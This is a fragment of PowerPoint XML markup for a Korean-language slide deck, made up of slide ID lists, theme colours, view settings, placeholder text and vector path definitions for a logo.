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4"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId105"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="286" r:id="rId2"/>
    <p:sldId id="285" r:id="rId3"/>
    <p:sldId id="268" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="292" r:id="rId6"/>
    <p:sldId id="293" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="296" r:id="rId10"/>
    <p:sldId id="297" r:id="rId11"/>
    <p:sldId id="410" r:id="rId12"/>
    <p:sldId id="299" r:id="rId13"/>
    <p:sldId id="300" r:id="rId14"/>
    <p:sldId id="420" r:id="rId15"/>
    <p:sldId id="301" r:id="rId16"/>
    <p:sldId id="303" r:id="rId17"/>
    <p:sldId id="304" r:id="rId18"/>
    <p:sldId id="305" r:id="rId19"/>
    <p:sldId id="306" r:id="rId20"/>
    <p:sldId id="307" r:id="rId21"/>
    <p:sldId id="402" r:id="rId22"/>
    <p:sldId id="311" r:id="rId23"/>
    <p:sldId id="391" r:id="rId24"/>
    <p:sldId id="314" r:id="rId25"/>
    <p:sldId id="312" r:id="rId26"/>
    <p:sldId id="315" r:id="rId27"/>
    <p:sldId id="316" r:id="rId28"/>
    <p:sldId id="317" r:id="rId29"/>
    <p:sldId id="319" r:id="rId30"/>
    <p:sldId id="320" r:id="rId31"/>
    <p:sldId id="321" r:id="rId32"/>
    <p:sldId id="322" r:id="rId33"/>
    <p:sldId id="323" r:id="rId34"/>
    <p:sldId id="324" r:id="rId35"/>
    <p:sldId id="325" r:id="rId36"/>
    <p:sldId id="327" r:id="rId37"/>
    <p:sldId id="329" r:id="rId38"/>
    <p:sldId id="332" r:id="rId39"/>
    <p:sldId id="333" r:id="rId40"/>
    <p:sldId id="335" r:id="rId41"/>
    <p:sldId id="336" r:id="rId42"/>
    <p:sldId id="339" r:id="rId43"/>
    <p:sldId id="345" r:id="rId44"/>
    <p:sldId id="346" r:id="rId45"/>
    <p:sldId id="347" r:id="rId46"/>
    <p:sldId id="349" r:id="rId47"/>
    <p:sldId id="351" r:id="rId48"/>
    <p:sldId id="352" r:id="rId49"/>
    <p:sldId id="354" r:id="rId50"/>
    <p:sldId id="355" r:id="rId51"/>
    <p:sldId id="411" r:id="rId52"/>
    <p:sldId id="412" r:id="rId53"/>
    <p:sldId id="413" r:id="rId54"/>
    <p:sldId id="421" r:id="rId55"/>
    <p:sldId id="425" r:id="rId56"/>
    <p:sldId id="426" r:id="rId57"/>
    <p:sldId id="436" r:id="rId58"/>
    <p:sldId id="358" r:id="rId59"/>
    <p:sldId id="359" r:id="rId60"/>
    <p:sldId id="360" r:id="rId61"/>
    <p:sldId id="361" r:id="rId62"/>
    <p:sldId id="362" r:id="rId63"/>
    <p:sldId id="363" r:id="rId64"/>
    <p:sldId id="364" r:id="rId65"/>
    <p:sldId id="365" r:id="rId66"/>
    <p:sldId id="366" r:id="rId67"/>
    <p:sldId id="367" r:id="rId68"/>
    <p:sldId id="368" r:id="rId69"/>
    <p:sldId id="369" r:id="rId70"/>
    <p:sldId id="370" r:id="rId71"/>
    <p:sldId id="371" r:id="rId72"/>
    <p:sldId id="372" r:id="rId73"/>
    <p:sldId id="373" r:id="rId74"/>
    <p:sldId id="374" r:id="rId75"/>
    <p:sldId id="375" r:id="rId76"/>
    <p:sldId id="393" r:id="rId77"/>
    <p:sldId id="394" r:id="rId78"/>
    <p:sldId id="437" r:id="rId79"/>
    <p:sldId id="401" r:id="rId80"/>
    <p:sldId id="400" r:id="rId81"/>
    <p:sldId id="403" r:id="rId82"/>
    <p:sldId id="415" r:id="rId83"/>
    <p:sldId id="416" r:id="rId84"/>
    <p:sldId id="417" r:id="rId85"/>
    <p:sldId id="418" r:id="rId86"/>
    <p:sldId id="419" r:id="rId87"/>
    <p:sldId id="422" r:id="rId88"/>
    <p:sldId id="423" r:id="rId89"/>
    <p:sldId id="424" r:id="rId90"/>
    <p:sldId id="427" r:id="rId91"/>
    <p:sldId id="428" r:id="rId92"/>
    <p:sldId id="429" r:id="rId93"/>
    <p:sldId id="430" r:id="rId94"/>
    <p:sldId id="431" r:id="rId95"/>
    <p:sldId id="432" r:id="rId96"/>
    <p:sldId id="376" r:id="rId97"/>
    <p:sldId id="408" r:id="rId98"/>
    <p:sldId id="409" r:id="rId99"/>
    <p:sldId id="377" r:id="rId100"/>
    <p:sldId id="379" r:id="rId101"/>
    <p:sldId id="406" r:id="rId102"/>
    <p:sldId id="266" r:id="rId10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807E"/>
    <a:srgbClr val="929292"/>
    <a:srgbClr val="C00000"/>
    <a:srgbClr val="0060A9"/>
    <a:srgbClr val="0058A6"/>
    <a:srgbClr val="C9CACA"/>
    <a:srgbClr val="3E3A39"/>
    <a:srgbClr val="B5B5B6"/>
    <a:srgbClr val="727171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50" autoAdjust="0"/>
    <p:restoredTop sz="96242" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="2004" y="108"/>
      </p:cViewPr>
      <p:guideLst/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191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BA096-1708-784F-84A3-AB907DE81B1F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2022-03-24</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1"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5268307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2408D-3904-2342-9910-FEC7468FD6D8}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2022-03-24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83A98-AA87-E24B-A34C-AAD66A0541C6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318439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83A98-AA87-E24B-A34C-AAD66A0541C6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581970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83A98-AA87-E24B-A34C-AAD66A0541C6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758365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83A98-AA87-E24B-A34C-AAD66A0541C6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89809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83A98-AA87-E24B-A34C-AAD66A0541C6}" type="slidenum">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>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143936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83A98-AA87-E24B-A34C-AAD66A0541C6}" type="slidenum">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>30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057752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83A98-AA87-E24B-A34C-AAD66A0541C6}" type="slidenum">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>31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3744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83A98-AA87-E24B-A34C-AAD66A0541C6}" type="slidenum">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>37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84659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83A98-AA87-E24B-A34C-AAD66A0541C6}" type="slidenum">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>76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204079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083A98-AA87-E24B-A34C-AAD66A0541C6}" type="slidenum">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>102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772075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33"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5946770" y="-3175"/>
            <a:ext cx="3197230" cy="2327275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2014"/>
              <a:gd name="T1" fmla="*/ 0 h 1466"/>
              <a:gd name="T2" fmla="*/ 2014 w 2014"/>
              <a:gd name="T3" fmla="*/ 0 h 1466"/>
              <a:gd name="T4" fmla="*/ 2014 w 2014"/>
              <a:gd name="T5" fmla="*/ 1466 h 1466"/>
              <a:gd name="T6" fmla="*/ 0 w 2014"/>
              <a:gd name="T7" fmla="*/ 0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4" h="1466">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2014" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2014" y="1466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0060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9" name="Freeform 34"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8278811" y="4192587"/>
            <a:ext cx="865189" cy="2665413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 545"/>
              <a:gd name="T1" fmla="*/ 1679 h 1679"/>
              <a:gd name="T2" fmla="*/ 545 w 545"/>
              <a:gd name="T3" fmla="*/ 1679 h 1679"/>
              <a:gd name="T4" fmla="*/ 545 w 545"/>
              <a:gd name="T5" fmla="*/ 0 h 1679"/>
              <a:gd name="T6" fmla="*/ 0 w 545"/>
              <a:gd name="T7" fmla="*/ 1679 h 1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45" h="1679">
                <a:moveTo>
                  <a:pt x="0" y="1679"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="545" y="1679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1679"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCBE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5115" y="1763692"/>
            <a:ext cx="8083085" cy="1726546"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3000" b="1" spc="-60" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="0058A6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5114" y="3675917"/>
            <a:ext cx="8083085" cy="36715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spc="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부제목 스타일 편집</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="내용 개체 틀 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375115" y="4599179"/>
            <a:ext cx="8083084" cy="532262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="72000" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="740"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz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kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>날자</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>부서 이름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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CA772C4E-F9E9-42EE-A7C6-2B5A06EE71C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221915" y="344762"/>
            <a:ext cx="1666800" cy="343777"/>
            <a:chOff x="7969251" y="1093788"/>
            <a:chExt cx="761999" cy="157162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146" name="AutoShape 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D5D87-71E0-464D-A0B1-7822DA75217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970838" y="1095375"/>
              <a:ext cx="760412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7" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D922C276-853B-403C-941F-5B163D7C7A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27988" y="1219200"/>
              <a:ext cx="20637" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 21"/>
                <a:gd name="T1" fmla="*/ 12 h 25"/>
                <a:gd name="T2" fmla="*/ 11 w 21"/>
                <a:gd name="T3" fmla="*/ 0 h 25"/>
                <a:gd name="T4" fmla="*/ 21 w 21"/>
                <a:gd name="T5" fmla="*/ 11 h 25"/>
                <a:gd name="T6" fmla="*/ 20 w 21"/>
                <a:gd name="T7" fmla="*/ 13 h 25"/>
                <a:gd name="T8" fmla="*/ 4 w 21"/>
                <a:gd name="T9" fmla="*/ 13 h 25"/>
                <a:gd name="T10" fmla="*/ 12 w 21"/>
                <a:gd name="T11" fmla="*/ 21 h 25"/>
                <a:gd name="T12" fmla="*/ 18 w 21"/>
                <a:gd name="T13" fmla="*/ 20 h 25"/>
                <a:gd name="T14" fmla="*/ 20 w 21"/>
                <a:gd name="T15" fmla="*/ 22 h 25"/>
                <a:gd name="T16" fmla="*/ 12 w 21"/>
                <a:gd name="T17" fmla="*/ 25 h 25"/>
                <a:gd name="T18" fmla="*/ 0 w 21"/>
                <a:gd name="T19" fmla="*/ 12 h 25"/>
                <a:gd name="T20" fmla="*/ 17 w 21"/>
                <a:gd name="T21" fmla="*/ 10 h 25"/>
                <a:gd name="T22" fmla="*/ 11 w 21"/>
                <a:gd name="T23" fmla="*/ 3 h 25"/>
                <a:gd name="T24" fmla="*/ 4 w 21"/>
                <a:gd name="T25" fmla="*/ 10 h 25"/>
                <a:gd name="T26" fmla="*/ 17 w 21"/>
                <a:gd name="T2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25">
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="21" y="4"/>
                    <a:pt x="21" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="12"/>
                    <a:pt x="20" y="13"/>
                    <a:pt x="20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8"/>
                    <a:pt x="8" y="21"/>
                    <a:pt x="12" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="21"/>
                    <a:pt x="16" y="21"/>
                    <a:pt x="18" y="20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18" y="23"/>
                    <a:pt x="15" y="25"/>
                    <a:pt x="12" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="25"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="5"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="5" y="6"/>
                    <a:pt x="4" y="10"/>
                  </a:cubicBez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8" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5F58EC-9D66-4176-81A4-8C7B3FE55C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8150" y="1219200"/>
              <a:ext cx="17462" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 18"/>
                <a:gd name="T1" fmla="*/ 0 h 24"/>
                <a:gd name="T2" fmla="*/ 3 w 18"/>
                <a:gd name="T3" fmla="*/ 0 h 24"/>
                <a:gd name="T4" fmla="*/ 3 w 18"/>
                <a:gd name="T5" fmla="*/ 4 h 24"/>
                <a:gd name="T6" fmla="*/ 3 w 18"/>
                <a:gd name="T7" fmla="*/ 4 h 24"/>
                <a:gd name="T8" fmla="*/ 11 w 18"/>
                <a:gd name="T9" fmla="*/ 0 h 24"/>
                <a:gd name="T10" fmla="*/ 18 w 18"/>
                <a:gd name="T11" fmla="*/ 9 h 24"/>
                <a:gd name="T12" fmla="*/ 18 w 18"/>
                <a:gd name="T13" fmla="*/ 24 h 24"/>
                <a:gd name="T14" fmla="*/ 14 w 18"/>
                <a:gd name="T15" fmla="*/ 24 h 24"/>
                <a:gd name="T16" fmla="*/ 14 w 18"/>
                <a:gd name="T17" fmla="*/ 10 h 24"/>
                <a:gd name="T18" fmla="*/ 10 w 18"/>
                <a:gd name="T19" fmla="*/ 3 h 24"/>
                <a:gd name="T20" fmla="*/ 3 w 18"/>
                <a:gd name="T21" fmla="*/ 7 h 24"/>
                <a:gd name="T22" fmla="*/ 3 w 18"/>
                <a:gd name="T23" fmla="*/ 24 h 24"/>
                <a:gd name="T24" fmla="*/ 0 w 18"/>
                <a:gd name="T25" fmla="*/ 24 h 24"/>
                <a:gd name="T26" fmla="*/ 0 w 18"/>
                <a:gd name="T2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24">
                  <a:moveTo>
                    <a:pt x="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2"/>
                    <a:pt x="8" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="9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5"/>
                    <a:pt x="13" y="3"/>
                    <a:pt x="10" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="6" y="4"/>
                    <a:pt x="3" y="7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9" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3167A4BD-8902-4406-A375-C3894734A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5138" y="1212850"/>
              <a:ext cx="14287" cy="30163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 15"/>
                <a:gd name="T1" fmla="*/ 23 h 31"/>
                <a:gd name="T2" fmla="*/ 3 w 15"/>
                <a:gd name="T3" fmla="*/ 10 h 31"/>
                <a:gd name="T4" fmla="*/ 0 w 15"/>
                <a:gd name="T5" fmla="*/ 10 h 31"/>
                <a:gd name="T6" fmla="*/ 0 w 15"/>
                <a:gd name="T7" fmla="*/ 7 h 31"/>
                <a:gd name="T8" fmla="*/ 4 w 15"/>
                <a:gd name="T9" fmla="*/ 6 h 31"/>
                <a:gd name="T10" fmla="*/ 4 w 15"/>
                <a:gd name="T11" fmla="*/ 0 h 31"/>
                <a:gd name="T12" fmla="*/ 7 w 15"/>
                <a:gd name="T13" fmla="*/ 0 h 31"/>
                <a:gd name="T14" fmla="*/ 7 w 15"/>
                <a:gd name="T15" fmla="*/ 6 h 31"/>
                <a:gd name="T16" fmla="*/ 14 w 15"/>
                <a:gd name="T17" fmla="*/ 6 h 31"/>
                <a:gd name="T18" fmla="*/ 14 w 15"/>
                <a:gd name="T19" fmla="*/ 10 h 31"/>
                <a:gd name="T20" fmla="*/ 7 w 15"/>
                <a:gd name="T21" fmla="*/ 10 h 31"/>
                <a:gd name="T22" fmla="*/ 7 w 15"/>
                <a:gd name="T23" fmla="*/ 23 h 31"/>
                <a:gd name="T24" fmla="*/ 11 w 15"/>
                <a:gd name="T25" fmla="*/ 27 h 31"/>
                <a:gd name="T26" fmla="*/ 14 w 15"/>
                <a:gd name="T27" fmla="*/ 27 h 31"/>
                <a:gd name="T28" fmla="*/ 15 w 15"/>
                <a:gd name="T29" fmla="*/ 30 h 31"/>
                <a:gd name="T30" fmla="*/ 10 w 15"/>
                <a:gd name="T31" fmla="*/ 31 h 31"/>
                <a:gd name="T32" fmla="*/ 3 w 15"/>
                <a:gd name="T33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31">
                  <a:moveTo>
                    <a:pt x="3" y="23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6"/>
                    <a:pt x="8" y="27"/>
                    <a:pt x="11" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="27"/>
                    <a:pt x="13" y="27"/>
                    <a:pt x="14" y="27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5" y="31"/>
                    <a:pt x="3" y="27"/>
                    <a:pt x="3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0" name="Freeform 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{517D46F5-BF83-4CA6-8D47-D406C56A29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05775" y="1219200"/>
              <a:ext cx="19050" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 20"/>
                <a:gd name="T1" fmla="*/ 12 h 25"/>
                <a:gd name="T2" fmla="*/ 11 w 20"/>
                <a:gd name="T3" fmla="*/ 0 h 25"/>
                <a:gd name="T4" fmla="*/ 20 w 20"/>
                <a:gd name="T5" fmla="*/ 11 h 25"/>
                <a:gd name="T6" fmla="*/ 20 w 20"/>
                <a:gd name="T7" fmla="*/ 13 h 25"/>
                <a:gd name="T8" fmla="*/ 4 w 20"/>
                <a:gd name="T9" fmla="*/ 13 h 25"/>
                <a:gd name="T10" fmla="*/ 12 w 20"/>
                <a:gd name="T11" fmla="*/ 21 h 25"/>
                <a:gd name="T12" fmla="*/ 18 w 20"/>
                <a:gd name="T13" fmla="*/ 20 h 25"/>
                <a:gd name="T14" fmla="*/ 19 w 20"/>
                <a:gd name="T15" fmla="*/ 22 h 25"/>
                <a:gd name="T16" fmla="*/ 11 w 20"/>
                <a:gd name="T17" fmla="*/ 25 h 25"/>
                <a:gd name="T18" fmla="*/ 0 w 20"/>
                <a:gd name="T19" fmla="*/ 12 h 25"/>
                <a:gd name="T20" fmla="*/ 17 w 20"/>
                <a:gd name="T21" fmla="*/ 10 h 25"/>
                <a:gd name="T22" fmla="*/ 11 w 20"/>
                <a:gd name="T23" fmla="*/ 3 h 25"/>
                <a:gd name="T24" fmla="*/ 4 w 20"/>
                <a:gd name="T25" fmla="*/ 10 h 25"/>
                <a:gd name="T26" fmla="*/ 17 w 20"/>
                <a:gd name="T2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5">
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:move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0" y="4"/>
                    <a:pt x="20" y="11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8"/>
                    <a:pt x="7" y="21"/>
                    <a:pt x="12" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="21"/>
                    <a:pt x="16" y="21"/>
                    <a:pt x="18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23"/>
                    <a:pt x="14" y="25"/>
                    <a:pt x="11" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="5"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="3"/>
                    <a:pt x="4" y="6"/>
                    <a:pt x="4" y="10"/>
                  </a:cubicBez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1" name="Freeform 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A02D60D1-636E-4405-8849-BAAC4C8A72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4350" y="1219200"/>
              <a:ext cx="12700" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 13"/>
                <a:gd name="T1" fmla="*/ 0 h 24"/>
                <a:gd name="T2" fmla="*/ 3 w 13"/>
                <a:gd name="T3" fmla="*/ 0 h 24"/>
                <a:gd name="T4" fmla="*/ 4 w 13"/>
                <a:gd name="T5" fmla="*/ 5 h 24"/>
                <a:gd name="T6" fmla="*/ 4 w 13"/>
                <a:gd name="T7" fmla="*/ 5 h 24"/>
                <a:gd name="T8" fmla="*/ 10 w 13"/>
                <a:gd name="T9" fmla="*/ 0 h 24"/>
                <a:gd name="T10" fmla="*/ 13 w 13"/>
                <a:gd name="T11" fmla="*/ 0 h 24"/>
                <a:gd name="T12" fmla="*/ 12 w 13"/>
                <a:gd name="T13" fmla="*/ 4 h 24"/>
                <a:gd name="T14" fmla="*/ 10 w 13"/>
                <a:gd name="T15" fmla="*/ 3 h 24"/>
                <a:gd name="T16" fmla="*/ 4 w 13"/>
                <a:gd name="T17" fmla="*/ 9 h 24"/>
                <a:gd name="T18" fmla="*/ 4 w 13"/>
                <a:gd name="T19" fmla="*/ 24 h 24"/>
                <a:gd name="T20" fmla="*/ 0 w 13"/>
                <a:gd name="T21" fmla="*/ 24 h 24"/>
                <a:gd name="T22" fmla="*/ 0 w 13"/>
                <a:gd name="T2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4">
                  <a:moveTo>
                    <a:pt x="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2"/>
                    <a:pt x="8" y="0"/>
                    <a:pt x="10" y="0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8" y="3"/>
                    <a:pt x="5" y="5"/>
                    <a:pt x="4" y="9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2" name="Freeform 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1883E873-0F72-44C8-B06C-A3D51390A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54988" y="1219200"/>
              <a:ext cx="20637" cy="31750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 21"/>
                <a:gd name="T1" fmla="*/ 0 h 34"/>
                <a:gd name="T2" fmla="*/ 4 w 21"/>
                <a:gd name="T3" fmla="*/ 0 h 34"/>
                <a:gd name="T4" fmla="*/ 4 w 21"/>
                <a:gd name="T5" fmla="*/ 3 h 34"/>
                <a:gd name="T6" fmla="*/ 4 w 21"/>
                <a:gd name="T7" fmla="*/ 3 h 34"/>
                <a:gd name="T8" fmla="*/ 12 w 21"/>
                <a:gd name="T9" fmla="*/ 0 h 34"/>
                <a:gd name="T10" fmla="*/ 21 w 21"/>
                <a:gd name="T11" fmla="*/ 12 h 34"/>
                <a:gd name="T12" fmla="*/ 11 w 21"/>
                <a:gd name="T13" fmla="*/ 25 h 34"/>
                <a:gd name="T14" fmla="*/ 4 w 21"/>
                <a:gd name="T15" fmla="*/ 22 h 34"/>
                <a:gd name="T16" fmla="*/ 4 w 21"/>
                <a:gd name="T17" fmla="*/ 26 h 34"/>
                <a:gd name="T18" fmla="*/ 4 w 21"/>
                <a:gd name="T19" fmla="*/ 34 h 34"/>
                <a:gd name="T20" fmla="*/ 0 w 21"/>
                <a:gd name="T21" fmla="*/ 34 h 34"/>
                <a:gd name="T22" fmla="*/ 0 w 21"/>
                <a:gd name="T23" fmla="*/ 0 h 34"/>
                <a:gd name="T24" fmla="*/ 17 w 21"/>
                <a:gd name="T25" fmla="*/ 12 h 34"/>
                <a:gd name="T26" fmla="*/ 11 w 21"/>
                <a:gd name="T27" fmla="*/ 3 h 34"/>
                <a:gd name="T28" fmla="*/ 4 w 21"/>
                <a:gd name="T29" fmla="*/ 6 h 34"/>
                <a:gd name="T30" fmla="*/ 4 w 21"/>
                <a:gd name="T31" fmla="*/ 19 h 34"/>
                <a:gd name="T32" fmla="*/ 10 w 21"/>
                <a:gd name="T33" fmla="*/ 21 h 34"/>
                <a:gd name="T34" fmla="*/ 17 w 21"/>
                <a:gd name="T35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3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1"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="12" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="21" y="5"/>
                    <a:pt x="21" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="20"/>
                    <a:pt x="16" y="25"/>
                    <a:pt x="11" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="25"/>
                    <a:pt x="6" y="24"/>
                    <a:pt x="4" y="22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0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="7"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="3"/>
                    <a:pt x="7" y="4"/>
                    <a:pt x="4" y="6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6" y="21"/>
                    <a:pt x="8" y="21"/>
                    <a:pt x="10" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="21"/>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17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3" name="Freeform 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E3B4D68-87F6-4899-941B-2A7C416EF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150" y="1219200"/>
              <a:ext cx="12700" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 13"/>
                <a:gd name="T1" fmla="*/ 0 h 24"/>
                <a:gd name="T2" fmla="*/ 3 w 13"/>
                <a:gd name="T3" fmla="*/ 0 h 24"/>
                <a:gd name="T4" fmla="*/ 4 w 13"/>
